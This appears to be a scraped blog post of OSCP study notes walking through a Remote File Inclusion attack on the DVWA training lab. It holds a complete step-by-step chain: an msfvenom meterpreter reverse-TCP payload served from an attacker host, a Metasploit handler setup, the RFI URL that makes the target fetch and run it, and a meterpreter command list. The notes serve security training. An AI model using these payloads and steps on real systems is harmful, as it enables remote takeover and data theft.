Remote File Inclusion[RFI]

Prepare:

Download the DVWA from the following website and deploy it on your server.

http://www.dvwa.co.uk/

Install XAMPP and DVWA:

1. Install XAMPP on Windows server. And change the Apache http port to 82 and ssl port to 4433.

2.Unzip the DVWA files to C:\xampp\htdocs.

3. Modify some configurations and browse the the DVWA website. The click the "Create/Reset Database" buttion.

4. Login the DVWA using admin/passsord.

5.Set the DVWA Security to Low and submit.

6. Go the File Inclusion page.

7. On Kali Linux, down load the file php-reverse-shell.php from the following website. And copy the file to /var/www/html.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

8.Change the ip and port and save it.

9.On the folder /var/www/html, create the exploit.php using the following commands.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.109 LPORT= >> expoit.php

10. Start the http server in the folder /var/www/html on Kali Linux.

python3 -m http.server

11. Start the metasploit tool , then set the LHOST, LPORT and payload moudle. Expolit  finanlly.

msfconsole

set LHOST 10.0.0.109

set LPORT 

set payload php/meterpreter/reverse_tcp

exploit

12.Browse the following url throuth Firefox.

http://10.0.0.212:/dvwa/vulnerabilities/fi/?page=http://10.0.0.109/exploit.php

Exploit the target server sucessfully.

13. Perform shell command to find usefull information.

Core Commands

=============

    Command                   Description

    -------                   -----------

    ?                         Help menu

    background                Backgrounds the current session

    bg                        Alias for background

    bgkill                    Kills a background meterpreter script

    bglist                    Lists running background scripts

    bgrun                     Executes a meterpreter script as a background thread

    channel                   Displays information or control active channels

    close                     Closes a channel

    disable_unicode_encoding  Disables encoding of unicode strings

    enable_unicode_encoding   Enables encoding of unicode strings

    exit                      Terminate the meterpreter session

    get_timeouts              Get the current session timeout values

    guid                      Get the session GUID

    help                      Help menu

    info                      Displays information about a Post module

    irb                       Open an interactive Ruby shell on the current session

    load                      Load one or more meterpreter extensions

    machine_id                Get the MSF ID of the machine attached to the session

    migrate                   Migrate the server to another process

    pivot                     Manage pivot listeners

    pry                       Open the Pry debugger on the current session

    quit                      Terminate the meterpreter session

    read                      Reads data from a channel

    resource                  Run the commands stored in a file

    run                       Executes a meterpreter script or Post module

    secure                    (Re)Negotiate TLV packet encryption on the session

    sessions                  Quickly switch to another session

    set_timeouts              Set the current session timeout values

    sleep                     Force Meterpreter to go quiet, then re-establish session.

    transport                 Change the current transport mechanism

    use                       Deprecated alias for "load"

    uuid                      Get the UUID for the current session

    write                     Writes data to a channel

Stdapi: File system Commands

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    checksum      Retrieve the checksum of a file

    cp            Copy source to destination

    dir           List files (alias for ls)

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lls           List local files

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    mv            Move source to destination

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands

===========================

    Command       Description

    -------       -----------

    portfwd       Forward a local port to a remote service

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command

    getenv        Get one or more environment variable values

    getpid        Get the current process identifier

    getuid        Get the user that the server is running as

    kill          Terminate a process

    localtime     Displays the target system's local date and time

    pgrep         Filter processes by name

    pkill         Terminate processes by name

    ps            List running processes

    shell         Drop into a system command shell

    sysinfo       Gets information about the remote system, such as OS

Stdapi: Audio Output Commands

=============================

    Command       Description

    -------       -----------

    play          play an audio file on target system, nothing written on disk

OSCP Learning Notes - WebApp Exploitation(5)的更多相关文章

  1. OSCP Learning Notes - WebApp Exploitation(4)

    Local File Inclusion[LFI] Target Pentester Lab: Download from the following website: https://www.vul ...

  2. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  3. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  4. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  5. OSCP Learning Notes - Post Exploitation(2)

    Windows Post Exploitation Target Server: IE8-Win 7 VM 1. Download and upload the fgdump, PwDump7, wc ...

  6. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  7. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  8. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. cb24a_c++_STL算法简介

    算法概述 算法部分主要由头文件<algorithm>,<numeric>和<functional>组成.       <algorithm>是所有STL ...

  2. skywalking的插件管理agent管理

    转载自博客:https://my.oschina.net/eacdy/blog/4304312/print Java Agent是插件化.可插拔的.Skywalking的插件分为三种: 引导插件:在a ...

  3. centos 6.5 上安装jdk

    1.首先明确自己的电脑上32位还是64位,自己的电脑是32位 2.下载jdk进入到oracle公司的主页 把页面拖到最下面 点击上面这个就可以下载以前比较低的版本 这里选择 32位的源码包的方式,将源 ...

  4. 入门大数据---Hbase是什么?

    一.Hbase是什么? Hbase属于NoSql的一种. NoSql数据库分为如下几类: Key-Value类型数据库 这类数据库主要会使用到一个哈希表,这个表有一个特定的键和一个指针指向特定的数据. ...

  5. vs code 初始化vue项目框架

    1.首先安装npm组件  下载地址:https://nodejs.org/en/ 安装完 2.配置环境变量 3.验证是否成功 node -v npm -v 4.替换npm 输入npm install ...

  6. 《UNIX环境高级编程》(APUE) 笔记第三章 - 文件I/O

    3 - 文件I/O Github 地址 1. 文件描述符 对于内核而言,所有打开的文件都通过 文件描述符 (file descriptor) 引用.当打开一个现有文件或创建一个新文件时,内核向进程返回 ...

  7. scrapy框架结构与工作原理

    组件: ENGINE:引擎,框架的核心,其他组件在其控制下协同工作. SCHEDULER:调度器,负责对SPIDER提交的下载请求进行调度 DOWNLOADER:下载器,负责下载页面,发送HTTP请求 ...

  8. Volatile关键字的解读

    原子性 定义: 在Java中,对基本数据类型的变量的读取和赋值操作是原子性操作,即这些操作是不可被中断的,要么执行,要么不执行. Java内存模型只保证了基本读取和赋值是原子性操作,如果要实现更大范围 ...

  9. 聊聊Java

    聊聊Java 笔记源于 视频教程Bilibili:狂神说Java 关注公众号:狂神说 能干嘛? 热度 TIOBE 狂神计划 三高:高可用.高性能.高并发 全球几千万的程序员都会Java,真正精通的不到 ...

  10. Ticket Game CodeForces - 1215D 博弈题

    题目描述 Monocarp and Bicarp live in Berland, where every bus ticket consists of n digits (n is an even ...